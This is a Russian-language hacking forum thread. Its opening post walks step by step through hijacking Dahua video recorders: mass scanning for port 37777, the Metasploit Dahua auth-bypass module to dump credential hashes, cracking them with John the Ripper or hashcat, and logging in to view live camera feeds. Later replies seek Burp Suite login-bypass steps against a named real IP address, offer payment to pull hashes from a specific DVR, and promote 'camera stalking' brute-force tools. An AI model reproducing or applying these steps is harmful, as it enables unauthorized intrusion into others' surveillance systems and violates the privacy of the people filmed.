Перехват ключей DVR или Dahua Bypass

Discussion in 'Статьи' started by Kevin Shindel, 5 May 2018.

  1. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Приветствую обиталей Ачата.
    Давно я не писал годноты.... почитал форум и понял что нужно что то толковое двинуть.
    Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA.

    Для начала нам нужны след. иснтрументы.
    + nmap
    + metasploit
    + john the ripper
    + Dahua SmartPSS (скачать можно с офф.сайта)

    Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.
    80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)
    37777 порт для проприетарного софта.

    Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)

    Итак запускаем nmap\masscan для поиска.

    команда для нмапа следующая:
    root@kali: nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt

    если у вас есть список ИПов в стандарте CIRD

    если по религиозным убеждениям используете масскан тогда печатайте так...
    root@kali: masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt

    можно сканировать из внешнего файла
    root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt
    для масскана аналогично
    root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt

    После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.

    root@kali: cat 37777.txt | sort | uniq > 37777_clear.txt

    Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.

    root@kali: service postgresql start
    root@kali: msfconsole
    root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass


    дальше сканер нужно настроить....

    root@kali: set ACTION USER
    root@kali: set THREADS 25


    теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку

    root@kali: set RHOSTS file:37777_clear.txt

    ждём....

    После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.
    Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )
    (Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

    root@kali: hashcat -m 0 -a 0 hash.txt -o cracked.txt /home/wordlist.txt

    Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.

    допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.

    root@kali: john hash.txt

    Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)
    После удачного брута проверяем пароли...

    root@kali: john hash.txt --show

    После того как мы подобрали пасс можно поступить двумя способами...
    Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...
    Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.
    сцыль "http://ru.dahuasecurity.com/ru/download_2.html"

    я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225"


    Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)
    Ставим галку сохранить пароль и больше он запрашивается не будет.

    [​IMG]

    [​IMG]

    Далее идём во вкладку HOME PAGE -> DEVICES

    [​IMG]

    Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.

    [​IMG]

    Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...

    [​IMG]


    Бонусом запилил видосик на скорую руку...


    https://yadi.sk/i/9E8pg8Iq3VPM6T
     
    #1 Kevin Shindel, 5 May 2018
    Last edited: 5 May 2018
    hydra, TOX1C, CRACK211 and 16 others like this.
  2. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ДД, можно поконкретнее про "логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3". Если не затруднит, напишите плиз, как это делается по порядку. (Kali Linux). Можно в личку.
     
  3. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Было бы здорово, если бы подсказали какие-нибудь онлайн-сервисы по расшифровки паролей к камерам дахуа вида $dahua$y11Ko7d0. На компе с кали уже 3 неделю john брутит около 100 паролей и около 70 - без результата.
     
  4. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    веб-морда дахуа отправляет зарос пароля хешом его в burpsuite и подменяешь.
     
  5. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере 69.138.119.231. Запустил burpsuite, дальше куда что? 0.png
    Может глупый вопрос, но в инете про такую реализацию инфы не нашел.
     
  6. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    здесь инфа https://blog.csdn.net/nixawk/article/details/62892129
     
  7. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Благодарю за ссылочку, но там очень коротко и не совсем понятен сам процесс(особенно через переводчик). Поэтому прошу описать процесс по шагам с фото или краткий видео-ролик(как для чайника), чтобы иметь понимание того, что делаешь и почему.
     
  8. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Это ты отсюда пришел ???
     

    Attached Files:

  9. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Нет, читал статью, увидел коммент с поправкой про мд5, решил спросить.
     
  10. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    ребят кто может вытащит хеш файл с конкретного двр к которому имеется доступ только через вай фай напишите заплачу за обучение
     
  11. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    На каком порту камера работает???
     
  12. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
     
  13. AlexDPNK

    AlexDPNK New Member

    Joined:
    13 Feb 2020
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    Dahua работают (по дефолту) на 37777.

    Умные переделывают порты, чтобы не забывать - 27777 или 47777.

    Для работы достаточно nmap (или RouterScan), MSF, John.
    Не работает с камерами (Stand-alone), вскрываются, по опыту 17 из 20.
     
    JustGo13 likes this.
  14. AlexDPNK

    AlexDPNK New Member

    Joined:
    13 Feb 2020
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    на 81м порту может работать какой угодно регистратор
    Чаще всего встречаются парни XiongMai, TVT, Shenzhen
    И там механизм получения доступа совсем иной
     
    JustGo13 likes this.
  15. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    парню надо был софт и уроки. он их получил от группы Asleep - Гайдs для самых начинающих по DVR камерам
     
  16. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Да ты сам по сути не знаешь дело какой гайд ты мне скинул
     
  17. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Посмотри личные сообщения
     
  18. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    КАМЕРОСТАЛКИНГ
    Камеры – как миллионы закрытых окон. Они ждут своего наблюдателя, случайного прохожего, заглянувшего без приглашения. Здесь мы собираем странные, интересные и красивые находки с камер по всему миру. Зафиксированный момент времени. Эстетика. Красота в глазах смотрящего.
    Гайды по поиску и получению доступа к камерам.
    Софт для изучения
    Полезные ссылки
    СОФТ ДЛЯ ИЗУЧЕНИЯ
    Программа для просмотра DVR/NVR: smartPSS:
    iOS/Android – iDMSS, gDMSS
    Dahua_Brute_Pass++
    SWC(Dahua)python
    SWC(Dahua)v1.2_hacked_dua
    HikBrute
    XiongMai
    Asleep Scanner
    NESCA

    1. Гайд для самых начинающих по DVR камерам на 37777. 37777_gayd Скачать
    2. Частично автоматизированный поиск камер Dahua с помощью сканера NESCA. NESCA37777BСкачать
    3. Краткий справочник по разным камерам. guide0_2_4Скачать
    4. Расширенное руководство по камерам. camsguide0_3_1Скачать

    Один человек собрал все что есть в открытом доступе. Что тебе надо было???
     
  19. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Я сегодня начну заниматься твоим гайдом если все будет работать то я буду очень благодарен мужик , и вознаграждение жди от меня
     
  20. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Но ссылки нет можешь дать ссылки на скачивания